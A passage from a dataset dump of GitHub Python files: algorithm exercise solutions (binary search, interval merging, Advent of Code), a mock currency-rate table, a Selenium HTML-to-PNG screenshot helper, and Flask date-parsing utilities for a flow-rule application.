l, r, x): \n# Check base case \n if r >= l: \n\n mid = l + (r - l) // 2\n\n# If element is present at the middle itself \n if arr[mid] == x: \n return mid \n\n# If element is smaller than mid, then it \n# can only be present in left subarray \n elif arr[mid] > x: \n return binarySearch(arr, l, mid-1, x) \n\n# Else the element can only be present # in right subarray \n else: \n return binarySearch(arr, mid + 1, r, x) \n\n else: \n # Element is not present in the array \n return -1\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n data = list(map(int, input().split()))\n n = data[0]\n sorted_arr = data[1:]\n data_element_to_find = list(map(int, input().split()))\n m = data_element_to_find[0]\n ele_to_find_arr = data_element_to_find[1:]\n\n \n for key in ele_to_find_arr:\n res = binarySearch(sorted_arr, 0, len(sorted_arr)-1, key) \n print(res, sep=' ', end=' ', flush=True)\n","repo_name":"tarunkukreja003/Algorithmic-Toolbox-Coursera-Solutions","sub_path":"feAw7ZC0SHOgMO2QtLhz8g_5e2cf32276ab4d838e5a2be642f85567_course1_2001022001/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9104986731","text":"# Solution 1: Sort the intervals by start time and then merge any overlapping intervals.\n\n# Although it appears this solution takes O(nlogn) time, if you code it by\n# using intervals.pop() it actually takes O(n^2).\n\n# This is because removing an element from an array takes O(n) time in the worst case.\n# Careful!!\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n intervals.sort(key=lambda x: x.start)\n i = 1\n while i < len(intervals):\n start1 = intervals[i-1].start\n end1 = intervals[i-1].end\n start2 = intervals[i].start\n end2 = intervals[i].end\n if start2 <= end1:\n intervals.pop(i)\n intervals[i-1].end = max(end1,end2)\n else:\n i += 1\n return intervals\n\n\n# Solution 2: Let's get rid of intervals.pop()\n# Use O(n) extra space to store merged intervals, reduces runtime complexity to O(nlogn)\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n if len(intervals) == 0:\n return intervals\n intervals.sort(key=lambda x:x.start)\n merged = [intervals[0]]\n for interval in intervals:\n if interval.start <= merged[-1].end:\n merged[-1].end = max(merged[-1].end, interval.end)\n else:\n merged.append(interval)\n return merged","repo_name":"BlakeBrown/LeetCode-Solutions","sub_path":"56 - Merge Intervals.py","file_name":"56 - Merge Intervals.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"43140572132","text":"\n\nexchange_usd = {\n \"rates\": {\n \"USD\": 1,\n \"AED\": 3.67,\n \"AFN\": 105.07,\n \"ALL\": 106.87,\n \"AMD\": 481.02,\n \"ANG\": 1.79,\n \"AOA\": 538.97,\n \"ARS\": 103.82,\n \"AUD\": 1.38,\n \"AWG\": 1.79,\n \"AZN\": 1.7,\n \"BAM\": 1.71,\n \"BBD\": 2,\n \"BDT\": 86,\n \"BGN\": 1.71,\n \"BHD\": 0.376,\n \"BIF\": 1994.23,\n \"BMD\": 1,\n \"BND\": 1.35,\n \"BOB\": 6.87,\n \"BRL\": 5.53,\n \"BSD\": 1,\n \"BTN\": 74.15,\n \"BWP\": 11.59,\n \"BYN\": 2.57,\n \"BZD\": 2,\n \"CAD\": 1.25,\n \"CDF\": 2000.41,\n \"CHF\": 0.912,\n \"CLP\": 819.84,\n \"CNY\": 6.36,\n \"COP\": 3939.72,\n \"CRC\": 635.62,\n \"CUP\": 24,\n \"CVE\": 96.46,\n \"CZK\": 21.43,\n \"DJF\": 177.72,\n \"DKK\": 6.53,\n \"DOP\": 57.49,\n \"DZD\": 139.57,\n \"EGP\": 15.71,\n \"ERN\": 15,\n \"ETB\": 49.83,\n \"EUR\": 0.875,\n \"FJD\": 2.12,\n \"FKP\": 0.732,\n \"FOK\": 6.53,\n \"GBP\": 0.732,\n \"GEL\": 3.08,\n \"GGP\": 0.732,\n \"GHS\": 6.64,\n \"GIP\": 0.732,\n \"GMD\": 53.45,\n \"GNF\": 9127.6,\n \"GTQ\": 7.7,\n \"GYD\": 209.63,\n \"HKD\": 7.79,\n \"HNL\": 24.5,\n \"HRK\": 6.59,\n \"HTG\": 101.53,\n \"HUF\": 311.51,\n \"IDR\": 14240.71,\n \"ILS\": 3.11,\n \"IMP\": 0.732,\n \"INR\": 74.15,\n \"IQD\": 1463.36,\n \"IRR\": 42171.77,\n \"ISK\": 128.41,\n \"JEP\": 0.732,\n \"JMD\": 154.95,\n \"JOD\": 0.709,\n \"JPY\": 114.09,\n \"KES\": 113.59,\n \"KGS\": 84.84,\n \"KHR\": 4083.65,\n \"KID\": 1.38,\n \"KMF\": 430.37,\n \"KRW\": 1189.41,\n \"KWD\": 0.3,\n \"KYD\": 0.833,\n \"KZT\": 435.15,\n \"LAK\": 11229.58,\n \"LBP\": 1507.5,\n \"LKR\": 202.43,\n \"LRD\": 148.54,\n \"LSL\": 15.37,\n \"LYD\": 4.6,\n \"MAD\": 9.16,\n \"MDL\": 18.02,\n \"MGA\": 3132.94,\n \"MKD\": 53.9,\n \"MMK\": 1779.21,\n \"MNT\": 2869.99,\n \"MOP\": 8.02,\n \"MRU\": 36.41,\n \"MUR\": 43.84,\n \"MVR\": 15.36,\n \"MWK\": 820.19,\n \"MXN\": 20.33,\n \"MYR\": 4.18,\n \"MZN\": 64.34,\n \"NAD\": 15.37,\n \"NGN\": 417.3,\n \"NIO\": 35.37,\n \"NOK\": 8.74,\n \"NPR\": 118.64,\n \"NZD\": 1.47,\n \"OMR\": 0.384,\n \"PAB\": 1,\n \"PEN\": 3.89,\n \"PGK\": 3.51,\n \"PHP\": 51.39,\n \"PKR\": 176.46,\n \"PLN\": 3.97,\n \"PYG\": 6884.13,\n \"QAR\": 3.64,\n \"RON\": 4.32,\n \"RSD\": 103.01,\n \"RUB\": 76.34,\n \"RWF\": 1042.94,\n \"SAR\": 3.75,\n \"SBD\": 7.98,\n \"SCR\": 13.68,\n \"SDG\": 442.15,\n \"SEK\": 8.99,\n \"SGD\": 1.35,\n \"SHP\": 0.732,\n \"SLL\": 11390,\n \"SOS\": 579.91,\n \"SRD\": 21.3,\n \"SSP\": 432.89,\n \"STN\": 21.43,\n \"SYP\": 2524.97,\n \"SZL\": 15.37,\n \"THB\": 33.24,\n \"TJS\": 11.27,\n \"TMT\": 3.5,\n \"TND\": 2.78,\n \"TOP\": 2.26,\n \"TRY\": 13.52,\n \"TTD\": 6.77,\n \"TVD\": 1.38,\n \"TWD\": 27.58,\n \"TZS\": 2317.76,\n \"UAH\": 27.84,\n \"UGX\": 3527,\n \"UYU\": 44.47,\n \"UZS\": 10918.91,\n \"VES\": 4.63,\n \"VND\": 22822.27,\n \"VUV\": 112.62,\n \"WST\": 2.58,\n \"XAF\": 573.82,\n \"XCD\": 2.7,\n \"XDR\": 0.711,\n \"XOF\": 573.82,\n \"XPF\": 104.39,\n \"YER\": 250.64,\n \"ZAR\": 15.37,\n \"ZMW\": 17.14,\n \"ZWL\": 108.71\n }\n}\n\n\nsupported_currencies = [{\"currency\": \"AED\", \"name\": \"UAE Dirham\", \"country\": \"United Arab Emirates\"},\n {\"currency\": \"AFN\", \"name\": \"Afghan Afghani\",\n \"country\": \"Afghanistan\"},\n {\"currency\": \"ALL\", \"name\": \"Albanian Lek\",\n \"country\": \"Albania\"},\n {\"currency\": \"AMD\", \"name\": \"Armenian Dram\",\n \"country\": \"Armenia\"},\n {\"currency\": \"ANG\", \"name\": \"Netherlands Antillian Guilder\",\n \"country\": \"Netherlands Antilles\"},\n {\"currency\": \"AOA\", \"name\": \"Angolan Kwanza\",\n \"country\": \"Angola\"},\n {\"currency\": \"ARS\", \"name\": \"Argentine Peso\",\n \"country\": \"Argentina\"},\n {\"currency\": \"AUD\", \"name\": \"Australian Dollar\",\n \"country\": \"Australia\"},\n {\"currency\": \"AWG\", \"name\": \"Aruban Florin\",\n \"country\": \"Aruba\"},\n {\"currency\": \"AZN\", \"name\": \"Azerbaijani Manat\",\n \"country\": \"Azerbaijan\"},\n {\"currency\": \"BAM\", \"name\": \"Bosnia and Herzegovina Mark\",\n \"country\": \"Bosnia and Herzegovina\"},\n {\"currency\": \"BBD\", \"name\": \"Barbados Dollar\",\n \"country\": \"Barbados\"},\n {\"currency\": \"BDT\", \"name\": \"Bangladeshi Taka\",\n \"country\": \"Bangladesh\"},\n {\"currency\": \"BGN\", \"name\": \"Bulgarian Lev\",\n \"country\": \"Bulgaria\"},\n {\"currency\": \"BHD\", \"name\": \"Bahraini Dinar\",\n \"country\": \"Bahrain\"},\n {\"currency\": \"BIF\", \"name\": \"Burundian Franc\",\n \"country\": \"Burundi\"},\n {\"currency\": \"BMD\", \"name\": \"Bermudian Dollar\",\n \"country\": \"Bermuda\"},\n {\"currency\": \"BND\", \"name\": \"Brunei Dollar\",\n \"country\": \"Brunei\"},\n {\"currency\": \"BOB\", \"name\": \"Bolivian Boliviano\",\n \"country\": \"Bolivia\"},\n {\"currency\": \"BRL\", \"name\": \"Brazilian Real\",\n \"country\": \"Brazil\"},\n {\"currency\": \"BSD\", \"name\": \"Bahamian Dollar\",\n \"country\": \"Bahamas\"},\n {\"currency\": \"BTN\", \"name\": \"Bhutanese Ngultrum\",\n \"country\": \"Bhutan\"},\n {\"currency\": \"BWP\", \"name\": \"Botswana Pula\",\n \"country\": \"Botswana\"},\n {\"currency\": \"BYN\", \"name\": \"Belarusian Ruble\",\n \"country\": \"Belarus\"},\n {\"currency\": \"BZD\", \"name\": \"Belize Dollar\",\n \"country\": \"Belize\"},\n {\"currency\": \"CAD\", \"name\": \"Canadian Dollar\",\n \"country\": \"Canada\"},\n {\"currency\": \"CDF\", \"name\": \"Congolese Franc\",\n \"country\": \"Democratic Republic of the Congo\"},\n {\"currency\": \"CHF\", \"name\": \"Swiss Franc\",\n \"country\": \"Switzerland\"},\n {\"currency\": \"CLP\", \"name\": \"Chilean Peso\",\n \"country\": \"Chile\"},\n {\"currency\": \"CNY\", \"name\": \"Chinese Renminbi\",\n \"country\": \"China\"},\n {\"currency\": \"COP\", \"name\": \"Colombian Peso\",\n \"country\": \"Colombia\"},\n {\"currency\": \"CRC\", \"name\": \"Costa Rican Colon\",\n \"country\": \"Costa Rica\"},\n {\"currency\": \"CUP\", \"name\": \"Cuban Peso\", \"country\": \"Cuba\"},\n {\"currency\": \"CVE\", \"name\": \"Cape Verdean Escudo\",\n \"country\": \"Cape Verde\"},\n {\"currency\": \"CZK\", \"name\": \"Czech Koruna\",\n \"country\": \"Czech Republic\"},\n {\"currency\": \"DJF\", \"name\": \"Djiboutian Franc\",\n \"country\": \"Djibouti\"},\n {\"currency\": \"DKK\", \"name\": \"Danish Krone\",\n \"country\": \"Denmark\"},\n {\"currency\": \"DOP\", \"name\": \"Dominican Peso\",\n \"country\": \"Dominican Republic\"},\n {\"currency\": \"DZD\", \"name\": \"Algerian Dinar\",\n \"country\": \"Algeria\"},\n {\"currency\": \"EGP\", \"name\": \"Egyptian Pound\",\n \"country\": \"Egypt\"},\n {\"currency\": \"ERN\", \"name\": \"Eritrean Nakfa\",\n \"country\": \"Eritrea\"},\n {\"currency\": \"ETB\", \"name\": \"Ethiopian Birr\",\n \"country\": \"Ethiopia\"},\n {\"currency\": \"EUR\", \"name\": \"Euro\",\n \"country\": \"European Union\"},\n {\"currency\": \"FJD\", \"name\": \"Fiji Dollar\", \"country\": \"Fiji\"},\n {\"currency\": \"FKP\", \"name\": \"Falkland Islands Pound\",\n \"country\": \"Falkland Islands\"},\n {\"currency\": \"FOK\", \"name\": \"Faroese Króna\",\n \"country\": \"Faroe Islands\"},\n {\"currency\": \"GBP\", \"name\": \"Pound Sterling\",\n \"country\": \"United Kingdom\"},\n {\"currency\": \"GEL\", \"name\": \"Georgian Lari\",\n \"country\": \"Georgia\"},\n {\"currency\": \"GGP\", \"name\": \"Guernsey Pound\",\n \"country\": \"Guernsey\"},\n {\"currency\": \"GHS\", \"name\": \"Ghanaian Cedi\",\n \"country\": \"Ghana\"},\n {\"currency\": \"GIP\", \"name\": \"Gibraltar Pound\",\n \"country\": \"Gibraltar\"},\n {\"currency\": \"GMD\", \"name\": \"Gambian Dalasi\",\n \"country\": \"The Gambia\"},\n {\"currency\": \"GNF\", \"name\": \"Guinean Franc\",\n \"country\": \"Guinea\"},\n {\"currency\": \"GTQ\", \"name\": \"Guatemalan Quetzal\",\n \"country\": \"Guatemala\"},\n {\"currency\": \"GYD\", \"name\": \"Guyanese Dollar\",\n \"country\": \"Guyana\"},\n {\"currency\": \"HKD\", \"name\": \"Hong Kong Dollar\",\n \"country\": \"Hong Kong\"},\n {\"currency\": \"HNL\", \"name\": \"Honduran Lempira\",\n \"country\": \"Honduras\"},\n {\"currency\": \"HRK\", \"name\": \"Croatian Kuna\",\n \"country\": \"Croatia\"},\n {\"currency\": \"HTG\", \"name\": \"Haitian Gourde\",\n \"country\": \"Haiti\"},\n {\"currency\": \"HUF\", \"name\": \"Hungarian Forint\",\n \"country\": \"Hungary\"},\n {\"currency\": \"IDR\", \"name\": \"Indonesian Rupiah\",\n \"country\": \"Indonesia\"},\n {\"currency\": \"ILS\", \"name\": \"Israeli New Shekel\",\n \"country\": \"Israel\"},\n {\"currency\": \"IMP\", \"name\": \"Manx Pound\",\n \"country\": \"Isle of Man\"},\n {\"currency\": \"INR\", \"name\": \"Indian Rupee\",\n \"country\": \"India\"},\n {\"currency\": \"IQD\", \"name\": \"Iraqi Dinar\", \"country\": \"Iraq\"},\n {\"currency\": \"IRR\", \"name\": \"Iranian Rial\", \"country\": \"Iran\"},\n {\"currency\": \"ISK\", \"name\": \"Icelandic Króna\",\n \"country\": \"Iceland\"},\n {\"currency\": \"JEP\", \"name\": \"Jersey Pound\",\n \"country\": \"Jersey\"},\n {\"currency\": \"JMD\", \"name\": \"Jamaican Dollar\",\n \"country\": \"Jamaica\"},\n {\"currency\": \"JOD\", \"name\": \"Jordanian Dinar\",\n \"country\": \"Jordan\"},\n {\"currency\": \"JPY\", \"name\": \"Japanese Yen\",\n \"country\": \"Japan\"},\n {\"currency\": \"KES\", \"name\": \"Kenyan Shilling\",\n \"country\": \"Kenya\"},\n {\"currency\": \"KGS\", \"name\": \"Kyrgyzstani Som\",\n \"country\": \"Kyrgyzstan\"},\n {\"currency\": \"KHR\", \"name\": \"Cambodian Riel\",\n \"country\": \"Cambodia\"},\n {\"currency\": \"KID\", \"name\": \"Kiribati Dollar\",\n \"country\": \"Kiribati\"},\n {\"currency\": \"KMF\", \"name\": \"Comorian Franc\",\n \"country\": \"Comoros\"},\n {\"currency\": \"KRW\", \"name\": \"South Korean Won\",\n \"country\": \"South Korea\"},\n {\"currency\": \"KWD\", \"name\": \"Kuwaiti Dinar\",\n \"country\": \"Kuwait\"},\n {\"currency\": \"KYD\", \"name\": \"Cayman Islands Dollar\",\n \"country\": \"Cayman Islands\"},\n {\"currency\": \"KZT\", \"name\": \"Kazakhstani Tenge\",\n \"country\": \"Kazakhstan\"},\n {\"currency\": \"LAK\", \"name\": \"Lao Kip\", \"country\": \"Laos\"},\n {\"currency\": \"LBP\", \"name\": \"Lebanese Pound\",\n \"country\": \"Lebanon\"},\n {\"currency\": \"LKR\", \"name\": \"Sri Lanka Rupee\",\n \"country\": \"Sri Lanka\"},\n {\"currency\": \"LRD\", \"name\": \"Liberian Dollar\",\n \"country\": \"Liberia\"},\n {\"currency\": \"LSL\", \"name\": \"Lesotho Loti\",\n \"country\": \"Lesotho\"},\n {\"currency\": \"LYD\", \"name\": \"Libyan Dinar\",\n \"country\": \"Libya\"},\n {\"currency\": \"MAD\", \"name\": \"Moroccan Dirham\",\n \"country\": \"Morocco\"},\n {\"currency\": \"MDL\", \"name\": \"Moldovan Leu\",\n \"country\": \"Moldova\"},\n {\"currency\": \"MGA\", \"name\": \"Malagasy Ariary\",\n \"country\": \"Madagascar\"},\n {\"currency\": \"MKD\", \"name\": \"Macedonian Denar\",\n \"country\": \"North Macedonia\"},\n {\"currency\": \"MMK\", \"name\": \"Burmese Kyat\",\n \"country\": \"Myanmar\"},\n {\"currency\": \"MNT\", \"name\": \"Mongolian Tögrög\",\n \"country\": \"Mongolia\"},\n {\"currency\": \"MOP\", \"name\": \"Macanese Pataca\",\n \"country\": \"Macau\"},\n {\"currency\": \"MRU\", \"name\": \"Mauritanian Ouguiya\",\n \"country\": \"Mauritania\"},\n {\"currency\": \"MUR\", \"name\": \"Mauritian Rupee\",\n \"country\": \"Mauritius\"},\n {\"currency\": \"MVR\", \"name\": \"Maldivian Rufiyaa\",\n \"country\": \"Maldives\"},\n {\"currency\": \"MWK\", \"name\": \"Malawian Kwacha\",\n \"country\": \"Malawi\"},\n {\"currency\": \"MXN\", \"name\": \"Mexican Peso\",\n \"country\": \"Mexico\"},\n {\"currency\": \"MYR\", \"name\": \"Malaysian Ringgit\",\n \"country\": \"Malaysia\"},\n {\"currency\": \"MZN\", \"name\": \"Mozambican Metical\",\n \"country\": \"Mozambique\"},\n {\"currency\": \"NAD\", \"name\": \"Namibian Dollar\",\n \"country\": \"Namibia\"},\n {\"currency\": \"NGN\", \"name\": \"Nigerian Naira\",\n \"country\": \"Nigeria\"},\n {\"currency\": \"NIO\", \"name\": \"Nicaraguan Córdoba\",\n \"country\": \"Nicaragua\"},\n {\"currency\": \"NOK\", \"name\": \"Norwegian Krone\",\n \"country\": \"Norway\"},\n {\"currency\": \"NPR\", \"name\": \"Nepalese Rupee\",\n \"country\": \"Nepal\"},\n {\"currency\": \"NZD\", \"name\": \"New Zealand Dollar\",\n \"country\": \"New Zealand\"},\n {\"currency\": \"OMR\", \"name\": \"Omani Rial\", \"country\": \"Oman\"},\n {\"currency\": \"PAB\", \"name\": \"Panamanian Balboa\",\n \"country\": \"Panama\"},\n {\"currency\": \"PEN\", \"name\": \"Peruvian Sol\", \"country\": \"Peru\"},\n {\"currency\": \"PGK\", \"name\": \"Papua New Guinean Kina\",\n \"country\": \"Papua New Guinea\"},\n {\"currency\": \"PHP\", \"name\": \"Philippine Peso\",\n \"country\": \"Philippines\"},\n {\"currency\": \"PKR\", \"name\": \"Pakistani Rupee\",\n \"country\": \"Pakistan\"},\n {\"currency\": \"PLN\", \"name\": \"Polish Złoty\",\n \"country\": \"Poland\"},\n {\"currency\": \"PYG\", \"name\": \"Paraguayan Guaraní\",\n \"country\": \"Paraguay\"},\n {\"currency\": \"QAR\", \"name\": \"Qatari Riyal\",\n \"country\": \"Qatar\"},\n {\"currency\": \"RON\", \"name\": \"Romanian Leu\",\n \"country\": \"Romania\"},\n {\"currency\": \"RSD\", \"name\": \"Serbian Dinar\",\n \"country\": \"Serbia\"},\n {\"currency\": \"RUB\", \"name\": \"Russian Ruble\",\n \"country\": \"Russia\"},\n {\"currency\": \"RWF\", \"name\": \"Rwandan Franc\",\n \"country\": \"Rwanda\"},\n {\"currency\": \"SAR\", \"name\": \"Saudi Riyal\",\n \"country\": \"Saudi Arabia\"},\n {\"currency\": \"SBD\", \"name\": \"Solomon Islands Dollar\",\n \"country\": \"Solomon Islands\"},\n {\"currency\": \"SCR\", \"name\": \"Seychellois Rupee\",\n \"country\": \"Seychelles\"},\n {\"currency\": \"SDG\", \"name\": \"Sudanese Pound\",\n \"country\": \"Sudan\"},\n {\"currency\": \"SEK\", \"name\": \"Swedish Krona\",\n \"country\": \"Sweden\"},\n {\"currency\": \"SGD\", \"name\": \"Singapore Dollar\",\n \"country\": \"Singapore\"},\n {\"currency\": \"SHP\", \"name\": \"Saint Helena Pound\",\n \"country\": \"Saint Helena\"},\n {\"currency\": \"SLL\", \"name\": \"Sierra Leonean Leone\",\n \"country\": \"Sierra Leone\"},\n {\"currency\": \"SOS\", \"name\": \"Somali Shilling\",\n \"country\": \"Somalia\"},\n {\"currency\": \"SRD\", \"name\": \"Surinamese Dollar\",\n \"country\": \"Suriname\"},\n {\"currency\": \"SSP\", \"name\": \"South Sudanese Pound\",\n \"country\": \"South Sudan\"},\n {\"currency\": \"STN\", \"name\": \"São Tomé and Príncipe Dobra\",\n \"country\": \"São Tomé and Príncipe\"},\n {\"currency\": \"SYP\", \"name\": \"Syrian Pound\",\n \"country\": \"Syria\"},\n {\"currency\": \"SZL\", \"name\": \"Eswatini Lilangeni\",\n \"country\": \"Eswatini\"},\n {\"currency\": \"THB\", \"name\": \"Thai Baht\",\n \"country\": \"Thailand\"},\n {\"currency\": \"TJS\", \"name\": \"Tajikistani Somoni\",\n \"country\": \"Tajikistan\"},\n {\"currency\": \"TMT\", \"name\": \"Turkmenistan Manat\",\n \"country\": \"Turkmenistan\"},\n {\"currency\": \"TND\", \"name\": \"Tunisian Dinar\",\n \"country\": \"Tunisia\"},\n {\"currency\": \"TOP\", \"name\": \"Tongan Paʻanga\",\n \"country\": \"Tonga\"},\n {\"currency\": \"TRY\", \"name\": \"Turkish Lira\",\n \"country\": \"Turkey\"},\n {\"currency\": \"TTD\", \"name\": \"Trinidad and Tobago Dollar\",\n \"country\": \"Trinidad and Tobago\"},\n {\"currency\": \"TVD\", \"name\": \"Tuvaluan Dollar\",\n \"country\": \"Tuvalu\"},\n {\"currency\": \"TWD\", \"name\": \"New Taiwan Dollar\",\n \"country\": \"Taiwan\"},\n {\"currency\": \"TZS\", \"name\": \"Tanzanian Shilling\",\n \"country\": \"Tanzania\"},\n {\"currency\": \"UAH\", \"name\": \"Ukrainian Hryvnia\",\n \"country\": \"Ukraine\"},\n {\"currency\": \"UGX\", \"name\": \"Ugandan Shilling\",\n \"country\": \"Uganda\"},\n {\"currency\": \"USD\", \"name\": \"United States Dollar\",\n \"country\": \"United States\"},\n {\"currency\": \"UYU\", \"name\": \"Uruguayan Peso\",\n \"country\": \"Uruguay\"},\n {\"currency\": \"UZS\", \"name\": \"Uzbekistani So'm\",\n \"country\": \"Uzbekistan\"},\n {\"currency\": \"VES\", \"name\": \"Venezuelan Bolívar Soberano\",\n \"country\": \"Venezuela\"},\n {\"currency\": \"VND\", \"name\": \"Vietnamese Đồng\",\n \"country\": \"Vietnam\"},\n {\"currency\": \"VUV\", \"name\": \"Vanuatu Vatu\",\n \"country\": \"Vanuatu\"},\n {\"currency\": \"WST\", \"name\": \"Samoan Tālā\",\n \"country\": \"Samoa\"},\n {\"currency\": \"XAF\", \"name\": \"Central African CFA Franc\",\n \"country\": \"CEMAC\"},\n {\"currency\": \"XCD\", \"name\": \"East Caribbean Dollar\",\n \"country\": \"Organisation of Eastern Caribbean States\"},\n {\"currency\": \"XDR\", \"name\": \"Special Drawing Rights\",\n \"country\": \"International Monetary Fund\"},\n {\"currency\": \"XOF\", \"name\": \"West African CFA franc\",\n \"country\": \"CFA\"},\n {\"currency\": \"XPF\", \"name\": \"CFP Franc\",\n \"country\": \"Collectivités d'Outre-Mer\"},\n {\"currency\": \"YER\", \"name\": \"Yemeni Rial\",\n \"country\": \"Yemen\"},\n {\"currency\": \"ZAR\", \"name\": \"South African Rand\",\n \"country\": \"South Africa\"},\n {\"currency\": \"ZMW\", \"name\": \"Zambian Kwacha\",\n \"country\": \"Zambia\"},\n {\"currency\": \"ZWL\", \"name\": \"Zimbabwean Dollar\",\n \"country\": \"Zimbabwe\"},\n ]\n\n\ndef all_supported_currencies():\n return supported_currencies\n\n\ndef exchange_to():\n return exchange_usd\n","repo_name":"Platzi-Master-C8/gethired-jobplacement-salaries-backend","sub_path":"app/exchanges/mockdata/exchenges_mockdata.py","file_name":"exchenges_mockdata.py","file_ext":"py","file_size_in_byte":23012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39164066182","text":"def html_to_png(input_html, output_png=\"./map.png\"):\n \"\"\"\n This function opens the html file given to input_html, takes a screenshot of it, and saves it\n as a png file.\n\n Parameters\n ----------\n input_html : str\n Relative path and name of the input html file. e.g., \"./map.html\" \n output_png : str\n Relative path and name of the output png file\n\n Returns\n -------\n Nothing\n \"\"\"\n import os\n import time\n from selenium import webdriver\n from selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n # delay is needed to give enough time for browser to load input_html file\n delay=5\n\n # contruct the full path for input_html\n input_url='file://{path}/{mapfile}'.format(path=os.getcwd(),mapfile=input_html)\n\n # launch firefox\n capabilities = webdriver.DesiredCapabilities().FIREFOX\n capabilities[\"marionette\"] = False\n #binary = FirefoxBinary(\"/usr/lib/firefox/firefox\")\n #browser = webdriver.Firefox(firefox_binary=binary)\n browser = webdriver.Firefox()\n #browser = webdriver.Chrome()\n\n # open the html file in a browser\n browser.get(input_url)\n\n #Give the map some time to load\n time.sleep(delay)\n \n # same the screen as png\n browser.save_screenshot(output_png)\n\n # exit from the browser\n browser.quit()\n\n return\n\n","repo_name":"MuhammadVT/bike_sharing","sub_path":"data_exploration/html_to_png.py","file_name":"html_to_png.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72079743185","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nsplit_data = True\ncompleted = True\nraw_data = None # Not To be touched\n\ndef part1(data):\n\tpipePoints = {}\n\n\tfor line in data:\n\t\tstart, end = line.split(' -> ')\n\t\tx1, y1 = start.split(',')\n\t\tx2, y2 = end.split(',')\n\t\tx1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n\t\t# Finding the direction of the pipe\n\t\tif x1 == x2: # horizontal\n\t\t\tsmallY, BigY = (y1, y2) if y1 < y2 else (y2, y1)\n\t\t\tfor y in range(smallY, BigY+1):\n\t\t\t\tif (x1, y) not in pipePoints: pipePoints[(x1, y)] = 0 \n\t\t\t\tpipePoints[(x1, y)] += 1\n\t\telif y1 == y2: # Vertical\n\t\t\tsmallX, BigX = (x1, x2) if x1 < x2 else (x2, x1)\n\t\t\tfor x in range(smallX, BigX+1):\n\t\t\t\tif (x, y1) not in pipePoints: pipePoints[(x, y1)] = 0 \n\t\t\t\tpipePoints[(x, y1)] += 1\n\n\t# Counting the amount of points with overlaps\n\treturn sum(1 for overlap in pipePoints.values() if overlap >= 2)\n\nfrom itertools import cycle\ndef part2(data):\n\tpipePoints = {}\n\n\tfor line in data:\n\t\tstart, end = line.split(' -> ')\n\t\tx1, y1 = start.split(',')\n\t\tx2, y2 = end.split(',')\n\t\tx1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n\n\t\t# Calculating the x points of the pipe\n\t\tx_range = range(x1, x2+1) if x2 > x1 else range(x1, x2-1, -1)\n\t\ty_range = range(y1, y2+1) if y2 > y1 else range(y1, y2-1, -1)\n\n\t\t# Now we apply cycle to the shorter point range.\n\t\t# This will deal with the horizontal and veritcal pipes :)\n\t\tif len(x_range) < len(y_range): x_range = cycle(x_range)\n\t\telif len(y_range) < len(x_range): y_range = cycle(y_range)\n\t\t\n\t\t# Now we simply mark those points in the pipePoint dataset\n\t\tfor point in zip(x_range, y_range):\n\t\t\tif point not in pipePoints: pipePoints[point] = 0\n\t\t\tpipePoints[point] += 1\n\t\n\t# Counting the amount of points with overlaps\n\treturn sum(1 for overlap in pipePoints.values() if overlap >= 2)","repo_name":"fschatbot/Advent-Calendar-Python","sub_path":"2021/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33123367205","text":"from operator import ge, lt\nfrom datetime import datetime, timedelta\nfrom flask import flash\nfrom flowapp.constants import (\n COMP_FUNCS,\n TIME_YEAR,\n TIME_US,\n TIME_STMP,\n TIME_FORMAT_ARG,\n RULE_TYPES,\n FORM_TIME_PATTERN,\n)\n\n\ndef other_rtypes(rtype):\n \"\"\"\n get rtype and return list of remaining rtypes\n for example get ipv4 and return [ipv6, rtbh]\n \"\"\"\n result = list(RULE_TYPES.keys())\n try:\n result.remove(rtype)\n except ValueError:\n pass\n\n return result\n\n\ndef output_date_format(json_request_data, pref_format=TIME_YEAR):\n \"\"\"\n prefer user setting from parameter, if the parameter is not set\n then use the prefered format computed from input date\n \"\"\"\n if not json_request_data:\n return pref_format\n\n if TIME_FORMAT_ARG in json_request_data and json_request_data[TIME_FORMAT_ARG]:\n return json_request_data[TIME_FORMAT_ARG]\n else:\n return pref_format\n\n\ndef parse_api_time(apitime):\n \"\"\"\n check if the api time is in US, EU or timestamp format\n :param apitime: string with date and time\n :returns: datetime, prefered format\n \"\"\"\n\n apitime = str(apitime)\n try:\n return (\n round_to_ten_minutes(datetime.strptime(apitime, FORM_TIME_PATTERN)),\n TIME_US,\n )\n except ValueError:\n mytime = False\n\n try:\n return round_to_ten_minutes(webpicker_to_datetime(apitime)), TIME_YEAR\n except ValueError:\n mytime = False\n\n try:\n return round_to_ten_minutes(webpicker_to_datetime(apitime, TIME_US)), TIME_US\n except ValueError:\n mytime = False\n\n try:\n return round_to_ten_minutes(datetime.fromtimestamp(int(apitime))), TIME_STMP\n except OverflowError:\n mytime = False\n except ValueError:\n mytime = False\n\n return False\n\n\ndef quote_to_ent(comment):\n \"\"\"\n Convert all \" to "\n Used for comment sanitize / because of tooltip in dashboard break when quotes are unescaped\n :param comment: string to be sanitized\n :return: string\n \"\"\"\n if comment:\n return comment.replace('\"', \""\")\n\n\ndef webpicker_to_datetime(webtime, format=TIME_YEAR):\n \"\"\"\n convert 'YYYY/MM/DD HH:mm' to datetime\n \"\"\"\n if format == 